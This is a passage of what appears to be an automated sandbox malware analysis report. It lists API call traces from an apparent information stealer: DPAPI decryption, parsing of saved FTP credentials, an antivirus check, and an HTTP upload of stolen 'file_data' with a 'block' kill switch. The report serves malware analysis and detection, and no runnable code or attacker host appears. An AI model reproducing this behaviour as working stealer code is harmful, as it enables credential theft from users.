                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 1799959500-0
                                                                                                        • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                        • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                        • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                        • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                        Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                        • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                        • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                        • String ID: DPAPI
                                                                                                        • API String ID: 2068576380-1690256801
                                                                                                        • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                        • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                        • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                        • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                        Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 907984538-0
                                                                                                        • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                        • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                        • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                        • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                        Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                        • wsprintfA.USER32 ref: 00410D7D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 362916592-0
                                                                                                        • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                        • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                        • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                        • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                        Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                        • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1206570057-0
                                                                                                        • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                        • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                        • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                        • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                        Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2452939696-0
                                                                                                        • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                        • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                        • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                        • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                        Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                        • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                        • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                        • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C
                                                                                                        Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 87 405eee-405f2e call 402920 * 6 call 41d016 52->87 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 316 405dcb-405dd0 309->316 317 405f2f 309->317 310->87 319 405e11-405e2e InternetReadFile 316->319 321 405e30-405e43 StrCmpCA 319->321 322 405dd2-405dda 319->322 324 405e45-405e46 ExitProcess 321->324 325 405e4c-405e52 InternetCloseHandle 321->325 322->321 326 405ddc-405e0c call 410609 call 41058d call 402920 322->326 325->119 326->319
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                          • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                          • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                          • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                        • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                        • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,e90840a846d017e7b095f7543cdf2d15,",build_id,00437814,------), ref: 00405C67
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                        • _memmove.LIBCMT ref: 00405CB4
                                                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                        • _memmove.LIBCMT ref: 00405CD6
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                        • _memmove.LIBCMT ref: 00405D05
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                        • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                        • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                        • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                        • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$e90840a846d017e7b095f7543cdf2d15$file_data
                                                                                                        • API String ID: 2638065154-3688182045
                                                                                                        • Opcode ID: 49e8160259788c3aa0c17ed973ab76f6e22aa84209453d778485c91eba621b05
                                                                                                        • Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
                                                                                                        • Opcode Fuzzy Hash: 49e8160259788c3aa0c17ed973ab76f6e22aa84209453d778485c91eba621b05
                                                                                                        • Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98
                                                                                                        Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • strtok_s.MSVCRT ref: 0040E77E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                        • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
